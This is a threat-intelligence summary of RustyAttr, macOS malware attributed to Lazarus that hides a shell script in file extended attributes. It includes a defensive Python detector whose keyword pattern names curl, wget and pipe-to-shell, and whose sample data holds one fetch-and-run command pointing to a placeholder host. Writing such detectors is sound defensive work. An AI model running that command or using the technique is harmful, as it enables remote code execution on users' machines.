New RustyAttr Malware Targets macOS Through Extended Attribute Abuse

November 14, 2024 at 04:57AM

A new malware family, RustyAttr, has been linked to the North Korean Lazarus Group. It hides its payload in macOS file extended attributes and arrives disguised as legitimate applications, using distractions such as error messages and fake PDFs. Built-in macOS protections still block it, so the attackers would need social engineering to get users to bypass those safeguards.

### Meeting Takeaways – November 14, 2024

#### Topic: Cryptojacking / Threat Intelligence

1. **New Malware Discovery**: A new malware named **RustyAttr** has been identified, exploiting extended attributes in macOS files.

2. **Attribution to Lazarus Group**: The activity has been moderately attributed to the **Lazarus Group**, linked to North Korea, based on previous campaign overlaps, particularly with **RustBucket**.

3. **Understanding Extended Attributes**:
– These are metadata entries attached to a file, separate from its contents, that can be listed and read with the `xattr` command.
– They can hold far more data than the standard file attributes (e.g., size, timestamps), which is what makes them usable as a hiding place.

4. **Malicious Applications**:
– The discovered applications utilize **Tauri**, a cross-platform framework, and are signed with a **revoked certificate**.
– They include an extended attribute designed to fetch and execute a shell script.
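A defender-side check written for this summary (it is not part of the original report or the researchers' tooling): it parses the `name: value` listing that `xattr -l` prints for a file and flags attributes outside Apple's own namespaces whose content looks like a shell script. The allowlist, the content heuristics, the `max_len` threshold and the sample listing (including its URL and IDs) are assumptions constructed for the example.

```python
"""Flag macOS extended attributes that carry script-like content.

Added example; allowlist and heuristics are assumptions, not the report's.
Input is `xattr -l <path>` text: each entry starts at column 0 as
`name: value`, or a bare `name:` followed by a hex dump for binary values.
"""
import re

# Attribute names macOS itself writes on downloaded or Finder-handled files.
BENIGN_PREFIXES = ("com.apple.quarantine", "com.apple.FinderInfo",
                   "com.apple.metadata:", "com.apple.lastuseddate#PS",
                   "com.apple.macl", "com.apple.provenance")

# Content that looks like a shell script or a fetch-and-run one-liner.
SCRIPT_HINTS = re.compile(
    r"^#!|\b(curl|wget|osascript|nohup|base64)\b|\|\s*(ba|z)?sh\b", re.M)
ENTRY_START = re.compile(r"^([A-Za-z0-9_.:#-]+?):(?: (.*))?$")

def parse_xattr_listing(text):
    """Return {name: value}; lines not starting an entry continue the last value."""
    attrs, current = {}, None
    for line in text.splitlines():
        m = ENTRY_START.match(line)
        if m:
            current = m.group(1)
            attrs[current] = m.group(2) or ""
        elif current is not None:
            attrs[current] += "\n" + line   # multi-line script body or hex dump
    return attrs

def suspicious_attrs(attrs, max_len=512):
    """Names of non-Apple attributes that are script-like or unusually large."""
    hits = []
    for name, value in attrs.items():
        if name.startswith(BENIGN_PREFIXES):
            continue
        if SCRIPT_HINTS.search(value) or len(value) > max_len:
            hits.append(name)
    return hits

# Constructed sample modelled on `xattr -l` output; URL and IDs are placeholders.
SAMPLE_LISTING = """\
com.apple.quarantine: 0083;66f1b0b1;Safari;00000000-0000-0000-0000-000000000000
com.apple.FinderInfo:
00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000020
com.example.buildinfo: 2024.11.1
test: #!/bin/sh
curl -s https://example.invalid/stage2.sh | sh
"""

if __name__ == "__main__":
    print("suspicious:", suspicious_attrs(parse_xattr_listing(SAMPLE_LISTING)))
```

Feeding it the output of `xattr -l` for each binary inside an `.app` bundle gives a quick triage signal; the vendor-style `com.example.buildinfo` entry shows that being non-Apple alone is not enough to trigger a hit.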

5. **Execution Mechanism**:
– Running the shell script activates a distraction mechanism, displaying either:
  – an error message (“This app does not support this version”), or
  – a benign-looking PDF concerning gaming projects.

6. **Web-based Component**:
– The Tauri application attempts to display an HTML webpage using **WebView**.
– This page is engineered to load malicious JavaScript that executes the content from the extended attributes via a Rust backend.
– If no extended attributes are present, a fake web page is displayed.

7. **Unclear Campaign Goals**: The specific objectives of this campaign remain unknown, with no confirmed victims or further payloads observed.

8. **User Interaction Required**:
– The researchers note that the attack only works if the user has turned off **Gatekeeper** (macOS's built-in malware protection), which indicates that social engineering plays a role in getting victims infected.

9. **Ongoing Threats**: North Korean actors continue to run broad campaigns built around remote job offers, tricking employees of cryptocurrency firms into downloading malware under false pretenses.

### Next Steps
– Continuous monitoring and updates on threat intelligence related to this malware are essential.
– Consider enhanced security training for employees regarding potential social engineering tactics related to remote job recruitment and malware risks.
